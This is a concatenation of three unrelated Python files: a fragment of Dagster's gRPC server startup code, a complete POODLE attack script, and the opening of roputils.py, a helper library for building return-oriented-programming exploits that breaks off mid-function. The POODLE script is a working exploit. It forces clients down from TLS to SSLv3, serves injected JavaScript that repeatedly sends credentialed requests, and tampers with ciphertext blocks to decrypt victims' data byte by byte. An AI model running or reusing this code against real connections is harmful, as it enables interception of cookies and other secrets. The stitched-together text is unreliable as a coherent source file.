health_pb2_grpc.add_HealthServicer_to_server(self._health_servicer, self.server)
add_DagsterApiServicer_to_server(self._api_servicer, self.server)
if port:
server_address = host + ":" + str(port)
else:
server_address = "unix:" + os.path.abspath(socket)
# grpc.Server.add_insecure_port returns:
# - 0 on failure
# - port number when a port is successfully bound
# - 1 when a UDS is successfully bound
res = self.server.add_insecure_port(server_address)
if socket and res != 1:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(socket)
if port and res != port:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(port)
def serve(self):
# Unfortunately it looks like ports bind late (here) and so this can fail with an error
# from C++ like:
#
# E0625 08:46:56.180112000 4697443776 server_chttp2.cc:40]
# {"created":"@1593089216.180085000","description":"Only 1 addresses added out of total
# 2 resolved","file":"src/core/ext/transport/chttp2/server/chttp2_server.cc",
# "file_line":406,"referenced_errors":[{"created":"@1593089216.180083000","description":
# "Unable to configure socket","fd":6,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":217,
# "referenced_errors":[{"created":"@1593089216.180079000",
# "description":"Address already in use","errno":48,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":190,"os_error":
# "Address already in use","syscall":"bind"}]}]}
#
# This is printed to stdout and there is no return value from server.start or exception
# raised in Python that we can use to handle this. The standard recipes for hijacking C
# stdout (so we could inspect this output and respond accordingly), e.g.
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/, don't seem
# to work (at least on Mac OS X) against grpc, and in any case would involve a huge
# cross-version and cross-platform maintenance burden. We have an issue open against grpc,
# https://github.com/grpc/grpc/issues/23315, and our own tracking issue at
self.server.start()
# Note: currently this is hardcoded as serving, since both services are cohosted
# pylint: disable=no-member
self._health_servicer.set("DagsterApi", health_pb2.HealthCheckResponse.SERVING)
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerStartedEvent())
server_termination_thread = threading.Thread(
target=server_termination_target,
args=[self._server_termination_event, self.server],
name="grpc-server-termination",
)
server_termination_thread.daemon = True
server_termination_thread.start()
self.server.wait_for_termination()
server_termination_thread.join()
self._api_servicer.cleanup()
class CouldNotStartServerProcess(Exception):
def __init__(self, port=None, socket=None):
super(CouldNotStartServerProcess, self).__init__(
"Could not start server with "
+ (
"port {port}".format(port=port)
if port is not None
else "socket {socket}".format(socket=socket)
)
)
def wait_for_grpc_server(server_process, client, subprocess_args, timeout=60):
start_time = time.time()
last_error = None
while True:
try:
client.ping("")
return
except DagsterUserCodeUnreachableError:
last_error = serializable_error_info_from_exc_info(sys.exc_info())
if time.time() - start_time > timeout:
raise Exception(
f"Timed out waiting for gRPC server to start with arguments: \"{' '.join(subprocess_args)}\". Most recent connection error: {str(last_error)}"
)
if server_process.poll() != None:
raise Exception(
f"gRPC server exited with return code {server_process.returncode} while starting up with the command: \"{' '.join(subprocess_args)}\""
)
sleep(0.1)
def open_server_process(
port,
socket,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
check.invariant((port or socket) and not (port and socket), "Set only port or socket")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.opt_int_param(max_workers, "max_workers")
from dagster.core.test_utils import get_mocked_system_timezone
mocked_system_timezone = get_mocked_system_timezone()
executable_path = loadable_target_origin.executable_path if loadable_target_origin else None
subprocess_args = (
(
get_python_environment_entry_point(executable_path)
if executable_path
else DEFAULT_DAGSTER_ENTRY_POINT
)
+ ["api", "grpc"]
+ ["--lazy-load-user-code"]
+ (["--port", str(port)] if port else [])
+ (["--socket", socket] if socket else [])
+ (["-n", str(max_workers)] if max_workers else [])
+ (["--heartbeat"] if heartbeat else [])
+ (["--heartbeat-timeout", str(heartbeat_timeout)] if heartbeat_timeout else [])
+ (["--fixed-server-id", fixed_server_id] if fixed_server_id else [])
+ (["--override-system-timezone", mocked_system_timezone] if mocked_system_timezone else [])
+ (["--log-level", "WARNING"]) # don't log INFO messages for automatically spun up servers
+ (["--use-python-environment-entry-point"] if executable_path else [])
)
if loadable_target_origin:
subprocess_args += loadable_target_origin.get_cli_args()
server_process = open_ipc_subprocess(subprocess_args)
from dagster.grpc.client import DagsterGrpcClient
client = DagsterGrpcClient(
port=port,
socket=socket,
host="localhost",
)
try:
wait_for_grpc_server(server_process, client, subprocess_args, timeout=startup_timeout)
except:
if server_process.poll() is None:
server_process.terminate()
raise
return server_process
def open_server_process_on_dynamic_port(
max_retries=10,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
server_process = None
retries = 0
while server_process is None and retries < max_retries:
port = find_free_port()
try:
server_process = open_server_process(
port=port,
socket=None,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
except CouldNotBindGrpcServerToAddress:
pass
retries += 1
return server_process, port
class GrpcServerProcess:
def __init__(
self,
loadable_target_origin=None,
force_port=False,
max_retries=10,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
self.port = None
self.socket = None
self.server_process = None
self.loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
check.bool_param(force_port, "force_port")
check.int_param(max_retries, "max_retries")
check.opt_int_param(max_workers, "max_workers")
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.int_param(startup_timeout, "startup_timeout")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
if seven.IS_WINDOWS or force_port:
self.server_process, self.port = open_server_process_on_dynamic_port(
max_retries=max_retries,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
else:
self.socket = safe_tempfile_path_unmanaged()
self.server_process = open_server_process(
port=None,
socket=self.socket,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
if self.server_process is None:
raise CouldNotStartServerProcess(port=self.port, socket=self.socket)
@property
def pid(self):
return self.server_process.pid
def wait(self, timeout=30):
if self.server_process.poll() is None:
seven.wait_for_process(self.server_process, timeout=timeout)
def create_ephemeral_client(self):
from dagster.grpc.client import EphemeralDagsterGrpcClient
return EphemeralDagsterGrpcClient(
port=self.port, socket=self.socket, server_process=self.server_process
)
|
main.py | import argparse
from urllib.parse import urlparse
import sys
import socket
import socketserver
import http.server
import struct
import select
from multiprocessing import Process, Manager
from multiprocessing.managers import BaseManager
from time import sleep, time
### Configuration ###
# select() timeout
timeout = 30.0
### TLS/SSL ###
class TLSRecord:
tlsContentType = {0: 'unknown', 20: 'change_cipher_spec', 21: 'alert', 22: 'handshake', 23: 'application_data'}
TYPE_ALERT = 22
TYPE_APPLICATION_DATA = 23
def __init__(self, rsocket):
self.raw = rsocket.recv(5)
if len(self.raw) < 5:
raise TypeError("Not a SSL/TLS packet")
self.contentType, self.majorVersion, self.minorVersion, self.length = struct.unpack("!BBBH", self.raw)
try:
self.textContentType = self.tlsContentType[self.contentType]
except KeyError:
self.textContentType = 0
self.content = rsocket.recv(self.length)
self.raw += self.content
def changeContent(self, newContent):
self.content = newContent
self.length = len(newContent)
self.raw = struct.pack("!BBBH", self.contentType, self.majorVersion, self.minorVersion,
self.length) + self.content
class SSLTLSHandler(socketserver.BaseRequestHandler):
def handle(self):
print_debug("Received connection from {}".format(self.client_address[0]))
tlsRecord = TLSRecord(self.request)
victims = self.server.victims
if tlsRecord.contentType == 0x16 and tlsRecord.majorVersion == 0x03 and tlsRecord.minorVersion > 0x00: # TLS >= 1.0 handshake -> kill it to degrade!
print_debug("Protocol minor version {:d} - trying to degrade.".format(tlsRecord.minorVersion))
return
else:
print_debug("Client uses SSLv3")
try:
# Connect to peer
self.forward = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.forward.connect((args.target_host, args.target_port))
self.forward.sendall(tlsRecord.raw)
# Resolve POODLE attack object
key = self.client_address[0]
try:
victim = victims[key]
except KeyError:
victim = POODLEAttack()
while (True):
readable, writable, errors = select.select((self.request, self.forward), (),
(self.request, self.forward), timeout)
if len(errors) > 0:
sockname = "unknown"
if errors[0] == self.request:
sockname = "client-side"
elif errors[0] == self.forward:
sockname = "server-side"
print_debug(sockname + " socket signalizes an error!")
break
for rsocket in readable:
ssocket = None
rsockname = "unknown"
ssockname = "unknown"
record = TLSRecord(rsocket)
if rsocket == self.forward:
ssocket = self.request
rsockname = "server"
ssockname = "client"
victim.checkTLSRecord(record)
else:
ssocket = self.forward
rsockname = "client"
ssockname = "server"
print_debug(
"Forwarding TLS record type {} of length {:d} from {} to {}".format(record.textContentType,
len(record.raw), rsockname,
ssockname))
# Received encrypted application data with request from client to server - attack
# Firefox (and possibly other browsers) inititate communication with a small application data record that doesn't contains the request.
# This is not the packet that we want, because of this the length check is performed in addition.
if rsocket == self.request and record.contentType == TLSRecord.TYPE_APPLICATION_DATA and len(
record.content) > 50:
record.changeContent(victim.doAttack(record.content))
ssocket.sendall(record.raw)
except IOError as e: # expected from network i/o
print_debug("I/O error: {} ({})".format(e.strerror, e.errno))
except TypeError: # Raised by base parsing code if packet is not TLS/SSL
pass
except StopIteration:
pass
# except Exception as e:
# print("Exception: " + str(e))
finally:
victim.connectionFinished()
victims[key] = victim
self.forward.close()
print_debug("Connection closed!")
class SSLTLSProxy(socketserver.ThreadingMixIn, socketserver.TCPServer):
allow_reuse_address = True
### HTTP ###
class PoodleHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.victims = self.server.victims
self.key = self.client_address[0]
try:
self.victim = victims[self.key]
except KeyError:
self.victim = POODLEAttack()
if self.path == "/":
self.sendRequestGenerator()
elif self.path == "/nextRequest":
self.sendNextRequest()
self.victims[self.key] = self.victim
def sendRequestGenerator(self):
print_debug("HTTP: Sending request generator")
self.send_response(200);
self.send_header("Content-Type", "text/html; charset=utf-8")
self.end_headers()
self.victim.expectTLSPacket() # make POODLE attack object aware, that a TLS packet related to the attack will arrive
response = """<!DOCTYPE html>
<h1>POODLE Request Generator</h1>
<script type="text/javascript">
""" + jsCode + """
</script>
"""
response = response.replace("###URL###", args.targetURL)
self.wfile.write(bytes(response, "utf-8"))
def sendNextRequest(self):
print_debug("HTTP: Sending next request parameters: url len={} post len={}".format(self.victim.urlLength,
self.victim.postLength))
self.send_response(200);
self.send_header("Content-Type", "text/html; charset=utf-8")
self.end_headers()
response = "{}:{}".format(self.victim.urlLength,
self.victim.postLength) # FIXME: sooooo un-threadsafe! But race condition shouldn't happen (famous last words (TM))
self.victim.expectTLSPacket() # make POODLE attack object aware, that a TLS packet related to the attack will arrive
self.wfile.write(bytes(response, "utf-8"));
def log_message(self, fmt, *arg):
if args.debug:
super().log_message(fmt, *arg)
else:
return
def version_string(self):
return "POODLE Request Generator"
### POODLE Attack ###
class POODLEAttack():
STATE_PADDING = 1 # Fill padding until next length jump
STATE_DECRYPT = 2 # Decryption stage - modify HTTP requests encrypted TLS application data packet
STATE_DECRYPT_MODIFIED = 3 # Decryption stage - packet was manipulated, waiting for response of the oracle
STATE_FINISHED = 100 # Something went wrong, passtrough mode
def __init__(self):
self.state = POODLEAttack.STATE_PADDING
self.lastLength = None # length of last received encrypted payload
self.blockSize = None # cipher block size determined from padding jumps
self.urlLength = 0 # current length of URL for the web server - IMPORTANT: also change in POODLEClient.js!
self.postLength = 26 # current length of POST payload for the web server - IMPORTANT: also change in POODLEClient.js!
self.basePostLength = None # current length of POST payload for the web server
self.startDecryptOffset = int(args.start_offset) # First byte from encrypted data to decrypt.
self.decryptOffset = None # Current byte to decrypt
self.curBlock = None # Block that contains current byte and should be moved to last (padding) block
self.expectPacket = False # indicator if packet was sent by HTTPS request generator. set when next request parameters are requested
self.plaintext = None # Is filled with leaked plaintext characters
self.requestCounts = [] # List of request counts per leaked byte
self.leakTimes = [] # List of times per leaked byte
def expectTLSPacket(self):
print_debug("POODLE Attack: expecting packet")
self.expectPacket = True
def connectionFinished(self):
print_debug("POODLE Attack: connection finished\n")
if self.state == POODLEAttack.STATE_DECRYPT_MODIFIED: # STATE_DECRYPT_MODIFIED state resets to STATE_DECRYPT on end of connection
self.state = POODLEAttack.STATE_DECRYPT
self.expectPacket = False
def decryptNextByte(self): # Calculate the request parameters for decryption of next byte
if self.decryptOffset == None:
self.decryptOffset = self.startDecryptOffset
else:
self.decryptOffset += 1
self.requestCount = 0
self.lastLeak = time()
(self.curBlock, i) = divmod(self.decryptOffset, self.blockSize)
self.urlLength = self.blockSize - i - 1
self.postLength = self.basePostLength - self.urlLength
print_debug(
"POODLE Attack: next decrypt-byte: {} (block {}) url length: {} post length: {}".format(self.decryptOffset,
self.curBlock,
self.urlLength,
self.postLength))
def decryptByte(self, appData): # positive oracle response - decrypt byte
appDataB = [appData[i:i + self.blockSize] for i in range(0, len(appData), self.blockSize)]
plaintext = (self.blockSize - 1) ^ appDataB[self.curBlock - 1][self.blockSize - 1] ^ \
appDataB[len(appDataB) - 2][self.blockSize - 1]
self.plaintext += chr(plaintext)
leakTime = time() - self.lastLeak
print("Decrypted byte {}: {} (0x{:02x}) in {:.4f} seconds with {} requests".format(self.decryptOffset,
chr(plaintext), plaintext,
leakTime, self.requestCount))
self.requestCounts.append(self.requestCount)
self.leakTimes.append(leakTime)
numBytes = len(self.plaintext)
sumReqCnt = sum(self.requestCounts)
avgReqCnt = sumReqCnt / numBytes
sumLeakTimes = sum(self.leakTimes)
avgLeakTimes = sumLeakTimes / numBytes
print(
"Victim now leaked {} bytes: \"{}\" {} requests and {:.3f} seconds per leaked bytes, {} requests and {:.3f} seconds total".format(
numBytes, self.plaintext, int(avgReqCnt), avgLeakTimes, sumReqCnt, sumLeakTimes))
self.decryptNextByte()
def doAttack(self, appData):
if not self.expectPacket: # Packet not expected - this must be signalized by the request generator
print_debug("POODLE Attack: unexpected packet - forwarding")
return appData
if self.state == POODLEAttack.STATE_PADDING:
if self.lastLength == None: # first packet - store data length and pass
self.lastLength = len(appData)
print_debug("POODLE Attack: received first TLS packet with application data length = {}".format(
self.lastLength))
elif self.lastLength > len(appData) or abs(self.lastLength - len(
appData)) > 16: # length jump in the wrong direction or unexpected amount, just pass it
print_debug(
"POODLE Attack: received packet ignored due to unexpected length jump. previous={} this={}".format(
self.lastLength, len(appData)))
elif self.lastLength < len(appData): # length jump, we know the padding length
self.blockSize = len(appData) - self.lastLength # difference is block size
self.numBlocks = int(len(appData) / self.blockSize)
self.basePostLength = self.postLength
self.decryptNextByte()
self.state = POODLEAttack.STATE_DECRYPT
self.plaintext = ""
self.lastLength = len(appData)
print_debug(
"POODLE Attack: application data length jump detected - padding length is now known! length={} block size={} post size={}".format(
len(appData), self.blockSize, self.postLength))
else: # add further byte to POST data
self.postLength += 1
print_debug("POODLE Attack: adding a byte to POST data: {} bytes".format(self.postLength))
return appData
elif self.state == POODLEAttack.STATE_DECRYPT: # decryption stage of the attack
if len(appData) == self.lastLength: # data size changes are not tolerated
self.requestCount += 1
print_debug("POODLE Attack: Trying to decrypt last byte of crypt block {}".format(self.curBlock))
self.changedData = appData[:(self.numBlocks - 1) * self.blockSize] + appData[
self.curBlock * self.blockSize:(
self.curBlock + 1) * self.blockSize]
self.state = POODLEAttack.STATE_DECRYPT_MODIFIED
return self.changedData
else:
print_debug(
"POODLE Attack: received packet ignored due to unexpected length jump. expected={} this={}".format(
self.lastLength, len(appData)))
return appData
else: # in any other case (including STATE_FINISHED): pass packets unaltered
print_debug("POODLE Attack: attack finished or undefined state - passing packet")
return appData
def checkTLSRecord(self, record): # Checks packet from server for oracle response
if self.state == POODLEAttack.STATE_DECRYPT_MODIFIED: # this is the state where an oracle response is expected
if record.contentType == TLSRecord.TYPE_ALERT:
self.state = POODLEAttack.STATE_DECRYPT
elif record.contentType == TLSRecord.TYPE_APPLICATION_DATA: # server accepted the manipulated packet - won one plaintext byte :-)
self.decryptByte(self.changedData)
self.state = POODLEAttack.STATE_DECRYPT
class POODLEManager(BaseManager):
pass
POODLEManager.register('POODLEAttack', POODLEAttack)
### Functions ###
def ssltlsServer(victims, poodleManager):
print("Starting SSL/TLS server on {}:{} forwarding to {}:{}".format(args.listen_host, args.listen_port_tls,
args.target_host, args.target_port))
server = SSLTLSProxy((args.listen_host, int(args.listen_port_tls)), SSLTLSHandler)
server.victims = victims
server.poodleManager = poodleManager
try:
server.serve_forever()
except KeyboardInterrupt:
print("Shutdown of SSL/TLS server on user request")
def httpServer(victims, poodleManager):
print("Starting HTTP server on {}:{} generating requests to {}".format(args.listen_host, args.listen_port_http,
args.targetURL))
server = http.server.HTTPServer((args.listen_host, int(args.listen_port_http)), PoodleHTTPRequestHandler)
server.victims = victims
server.poodleManager = poodleManager
try:
server.serve_forever()
except KeyboardInterrupt:
print("Shutdown of HTTP server on user request")
def print_debug(msg):
if args.debug:
print(msg)
def hexdump(bin):
return "\n".join([" ".join(["{:02x}".format(c) for c in bin[i:i + 16]]) for i in range(0, len(bin), 16)])
### Main ###
if __name__ == '__main__':
argparser = argparse.ArgumentParser(description="The POODLE Attack")
argparser.add_argument("targetURL",
help="Target URL. Requests are performed against this URL and TLS forwardings are derived from this.")
argparser.add_argument("--listen-host", "-lh", default="", help="TLS/SSL and HTTP listening host")
argparser.add_argument("--listen-port-tls", "-lpt", default="443", help="TLS/SSL listening port")
argparser.add_argument("--listen-port-http", "-lph", default="80", help="HTTP listening port")
argparser.add_argument("--target-host", "-th", default=None,
help="Target host override, normally derived from target URL")
argparser.add_argument("--target-port", "-tp", default=None,
help="Target port override, normally derived from target URL")
argparser.add_argument("--start-offset", "-so", default=384, help="Start decryption at this offset")
argparser.add_argument("--debug", "-d", action="store_true", help="Debugging output")
args = argparser.parse_args()
targetURL = urlparse(args.targetURL)
if targetURL.scheme != "https":
print("Target must be HTTPS URL!");
sys.exit(1)
args.target_host = args.target_host or targetURL.hostname
args.target_port = int(args.target_port or 0) or int(targetURL.port or 443)
# jsFile = open("POODLEClient.js", "r")
jsCode = """
var urllen = 0;
var postlen = 26;
var delay = 10;
function strPad(n) {
if (n > 0) {
return Array(n + 1).join("A");
} else {
return "";
}
}
function performSSLRequest() {
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = sslRequestHandler;
xhr.withCredentials = true;
xhr.open("POST", "###URL###?" + strPad(urllen));
xhr.send(strPad(postlen));
}
function sslRequestHandler() {
if (this.readyState == this.DONE) {
queryNextRequest();
}
}
function queryNextRequest() {
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = queryNextRequestHandler;
xhr.open("GET", "/nextRequest");
xhr.send(null);
}
function queryNextRequestHandler() {
if (this.readyState == this.DONE) {
var res = this.responseText.split(":");
urllen = Number(res[0]);
postlen = Number(res[1]);
setTimeout(performSSLRequest, delay);
}
}
performSSLRequest();
"""
# jsFile.close()
manager = Manager()
poodleManager = POODLEManager()
poodleManager.start()
victims = manager.dict()
poodleSSLTLSServer = Process(target=ssltlsServer, args=(victims, poodleManager))
poodleSSLTLSServer.start()
poodleHTTPServer = Process(target=httpServer, args=(victims, poodleManager))
poodleHTTPServer.start()
try:
poodleSSLTLSServer.join()
poodleHTTPServer.join()
except KeyboardInterrupt:
print("Bye!") |
roputils.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import sys
import os
import re
import struct
import socket
import select
import random
import tempfile
from pwn import *
from subprocess import Popen, PIPE
from threading import Thread, Event
from telnetlib import Telnet
from contextlib import contextmanager
#context.log_level = 'debug'
def int16(x):
if isinstance(x, (list, tuple)):
return [int(n, 16) for n in x]
else:
return int(x, 16)
def p32(x):
if isinstance(x, str):
return struct.unpack('<I', x)[0]
elif isinstance(x, (list, tuple)):
return struct.pack('<' + ('I'*len(x)), *x)
else:
return struct.pack('<I', x)
def p64(x):
if isinstance(x, str):
return struct.unpack('<Q', x)[0]
elif isinstance(x, (list, tuple)):
return struct.pack('<' + ('Q'*len(x)), *x)
else:
return struct.pack('<Q', x)
class ELF(object):
def __init__(self, fpath, base=0):
def env_with(d):
env = os.environ.copy()
env.update(d)
return env
self.fpath = fpath
#print 'fpath:'+fpath
self.base = base
self.sec = dict(relro=False, bind_now=False, stack_canary=False, nx=False, pie=False, rpath=False, runpath=False, dt_debug=False)
if not os.path.exists(fpath):
raise Exception("file not found: %r" % fpath)
self._entry_point = None
self._section = {}
self._dynamic = {}
self._got = {}
self._plt = {}
self._symbol = {}
self._load_blobs = []
self._string = {}
regexp = {
'section': r'^\s*\[(?P<Nr>[^\]]+)\]\s+(?P<Name>\S+)\s+(?P<Type>\S+)\s+(?P<Address>\S+)\s+(?P<Off>\S+)\s+(?P<Size>\S+)\s+(?P<ES>\S+)\s+(?P<Flg>\S+)\s+(?P<Lk>\S+)\s+(?P<Inf>\S+)\s+(?P<Al>\S+)$',
'program': r'^\s*(?P<Type>\S+)\s+(?P<Offset>\S+)\s+(?P<VirtAddr>\S+)\s+(?P<PhysAddr>\S+)\s+(?P<FileSiz>\S+)\s+(?P<MemSiz>\S+)\s+(?P<Flg>.{3})\s+(?P<Align>\S+)$',
'dynamic': r'^\s*(?P<Tag>\S+)\s+\((?P<Type>[^)]+)\)\s+(?P<Value>.+)$',
'reloc': r'^\s*(?P<Offset>\S+)\s+(?P<Info>\S+)\s+(?P<Type>\S+)\s+(?P<Value>\S+)\s+(?P<Name>\S+)(?: \+ (?P<AddEnd>\S+))?$',
'symbol': r'^\s*(?P<Num>[^:]+):\s+(?P<Value>\S+)\s+(?P<Size>\S+)\s+(?P<Type>\S+)\s+(?P<Bind>\S+)\s+(?P<Vis>\S+)\s+(?P<Ndx>\S+)\s+(?P<Name>\S+)',
'string': r'([\s\x21-\x7e]{4,})\x00',
}
plt_size_map = {
'i386': (0x10, 0x10),
'x86-64': (0x10, 0x10),
'arm': (0x14, 0xc),
}
has_dynamic_section = True
has_symbol_table = True
p = Popen(['readelf', '-W', '-a', fpath], env=env_with({"LC_MESSAGES": "C"}), stdout=PIPE)
# read ELF Header
while True:
#print 'prpr'
line = p.stdout.readline()
#print 'ha'
#print 'line:'+line
if line == 'Section Headers:\n':
break
m = re.search(r'^\s*(?P<key>[^:]+):\s+(?P<value>.+)$', line)
if not m:
continue
key, value = m.group('key', 'value')
if key == 'Class':
if value == 'ELF64':
self.wordsize = 8
elif value == 'ELF32':
self.wordsize = 4
else:
raise Exception("unsupported ELF Class: %r" % value)
elif key == 'Type':
if value == 'DYN (Shared object file)':
self.sec['pie'] = True
elif value == 'EXEC (Executable file)':
self.sec['pie'] = False
else:
raise Exception("unsupported ELF Type: %r" % value)
elif key == 'Machine':
if value == 'Advanced Micro Devices X86-64':
self.arch = 'x86-64'
elif value == 'Intel 80386':
self.arch = 'i386'
elif value == 'ARM':
self.arch = 'arm'
else:
raise Exception("unsupported ELF Machine: %r" % value)
elif key == 'Entry point address':
self._entry_point = int16(value)
# read Section Headers
while True:
line = p.stdout.readline()
if line == 'Program Headers:\n':
break
m = re.search(regexp['section'], line)
if not m or m.group('Nr') == 'Nr':
continue
name = m.group('Name')
address, size = int16(m.group('Address', 'Size'))
self._section[name] = (address, size)
# read Program Headers
while True:
line = p.stdout.readline()
if line.startswith('Dynamic section'):
has_dynamic_section = True
break
elif line == 'There is no dynamic section in this file.\n':
has_dynamic_section = False
break
m = re.search(regexp['program'], line)
if not m or m.group('Type') == 'Type':
continue
type_, flg = m.group('Type', 'Flg')
offset, virtaddr, filesiz = int16(m.group('Offset', 'VirtAddr', 'FileSiz'))
if type_ == 'GNU_RELRO':
self.sec['relro'] = True
elif type_ == 'GNU_STACK':
if not 'E' in flg:
self.sec['nx'] = True
elif type_ == 'LOAD':
with open(fpath, 'rb') as f:
f.seek(offset)
blob = f.read(filesiz)
is_executable = ('E' in flg)
self._load_blobs.append((virtaddr, blob, is_executable))
for m in re.finditer(regexp['string'], blob):
self._string[virtaddr+m.start()] = m.group(1)
# read Dynamic section
while has_dynamic_section:
line = p.stdout.readline()
if line.startswith('Relocation section'):
break
m = re.search(regexp['dynamic'], line)
if not m or m.group('Tag') == 'Tag':
continue
type_, value = m.group('Type', 'Value')
if type_ == 'BIND_NOW':
self.sec['bind_now'] = True
elif type_ == 'RPATH':
self.sec['rpath'] = True
elif type_ == 'RUNPATH':
self.sec['runpath'] = True
elif type_ == 'DEBUG':
self.sec['dt_debug'] = True
if value.startswith('0x'):
self._dynamic[type_] = int16(value)
elif value.endswith(' (bytes)'):
self._dynamic[type_] = int(value.split()[0])
# read Relocation section (.rel.plt/.rela.plt)
in_unwind_table_index = False
plt_header_size, plt_entry_size = plt_size_map[self.arch]
while True:
line = p.stdout.readline()
if line.startswith('Symbol table'):
has_symbol_table = True
break
elif line == 'No version information found in this file.\n':
has_symbol_table = False
break
elif in_unwind_table_index or line.startswith('Unwind table index'):
in_unwind_table_index = True
continue
m = re.search(regexp['reloc'], line)
if not m or m.group('Offset') == 'Offset':
continue
type_, name = m.group('Type', 'Name')
offset, info = int16(m.group('Offset', 'Info'))
if not type_.endswith('JUMP_SLOT'):
continue
name = name.split('@')[0]
self._got[name] = offset
self._plt[name] = self._section['.plt'][0] + plt_header_size + plt_entry_size * len(self._plt)
if name == '__stack_chk_fail':
self.sec['stack_canary'] = True
# read Symbol table
while has_symbol_table:
line = p.stdout.readline()
if line.startswith('Version symbols section') or line == 'No version information found in this file.\n':
break
m = re.search(regexp['symbol'], line)
if not m or m.group('Num') == 'Num':
continue
if m.group('Ndx') == 'UND':
continue
name, value = m.group('Name'), int16(m.group('Value'))
self._symbol[name] = value
if '@@' in name:
default_name = name.split('@@')[0]
self._symbol[default_name] = value
p.wait()
def set_base(self, addr, ref_symbol=None):
self.base = addr
if ref_symbol:
self.base -= self._symbol[ref_symbol]
def offset(self, offset):
return self.base + offset
def section(self, name):
return self.offset(self._section[name][0])
def dynamic(self, name):
return self.offset(self._dynamic[name])
def got(self, name=None):
if name:
return self.offset(self._got[name])
else:
return self.dynamic('PLTGOT')
def plt(self, name=None):
if name:
return self.offset(self._plt[name])
else:
return self.offset(self._section['.plt'][0])
def addr(self, name):
return self.offset(self._symbol[name])
def str(self, name):
return self.search(name + '\x00')
def search(self, s, xonly=False):
if isinstance(s, int):
s = self.p(s)
for virtaddr, blob, is_executable in self._load_blobs:
if xonly and not is_executable:
continue
if isinstance(s, re._pattern_type):
for m in re.finditer(s, blob):
addr = self.offset(virtaddr + m.start())
if self.arch == 'arm' and xonly and addr % 2 != 0:
continue
return addr
else:
i = -1
while True:
i = blob.find(s, i+1)
if i == -1:
break
addr = self.offset(virtaddr + i)
if self.arch == 'arm' and xonly and addr % 2 != 0:
continue
return addr
else:
raise ValueError()
def checksec(self):
result = ''
if self.sec['relro']:
result += '\033[32mFull RELRO \033[m ' if self.sec['bind_now'] else '\033[33mPartial RELRO\033[m '
else:
result += '\033[31mNo RELRO \033[m '
result += '\033[32mCanary found \033[m ' if self.sec['stack_canary'] else '\033[31mNo canary found\033[m '
result += '\033[32mNX enabled \033[m ' if self.sec['nx'] else '\033[31mNX disabled\033[m '
result += '\033[32mPIE enabled \033[m ' if self.sec['pie'] else '\033[31mNo PIE \033[m '
result += '\033[31mRPATH \033[m ' if self.sec['rpath'] else '\033[32mNo RPATH \033[m '
result += '\033[31mRUNPATH \033[m ' if self.sec['runpath'] else '\033[32mNo RUNPATH \033[m '
result += self.fpath
print 'RELRO STACK CANARY NX PIE RPATH RUNPATH FILE'
print "%s\n" % result
fortified_funcs = [name for name in self._plt if re.search(r'^__\w+_chk$', name)]
if fortified_funcs:
print "FORTIFY_SOURCE: \033[32mFortified\033[m (%s)" % ', '.join(fortified_funcs)
else:
print 'FORTIFY_SOURCE: \033[31mNo\033[m'
def objdump(self):
p = Popen(Asm.cmd[self.arch]['objdump'] + [self.fpath], stdout=PIPE)
stdout, stderr = p.communicate()
rev_symbol = {}
rev_plt = {}
for k, v in self._symbol.iteritems():
rev_symbol.setdefault(v, []).append(k)
for k, v in self._plt.iteritems():
rev_plt.setdefault(v, []).append(k)
lines = []
labels = {}
code_xrefs = {}
data_xrefs = {}
# collect addresses
for line in stdout.splitlines():
ary = line.strip().split(':', 1)
try:
addr, expr = int16(ary[0]), ary[1]
labels[addr] = None
except ValueError:
addr, expr = None, None
lines.append((line, addr, expr))
# collect references
for line, addr, expr in lines:
if addr is None:
continue
if addr == self._entry_point:
labels[addr] = '_start'
m = re.search(r'call\s+(?:0x)?([\dA-Fa-f]+)\b', line)
if m:
ref = int16(m.group(1))
labels[ref] = "sub_%x" % ref
code_xrefs.setdefault(ref, set()).add(addr)
m = re.search(r'j\w{1,2}\s+(?:0x)?([\dA-Fa-f]+)\b', line)
if m:
ref = int16(m.group(1))
labels[ref] = "loc_%x" % ref
code_xrefs.setdefault(ref, set()).add(addr)
for m in re.finditer(r',0x([\dA-Fa-f]{3,})\b', expr):
ref = int16(m.group(1))
if ref in labels:
labels[ref] = "loc_%x" % ref
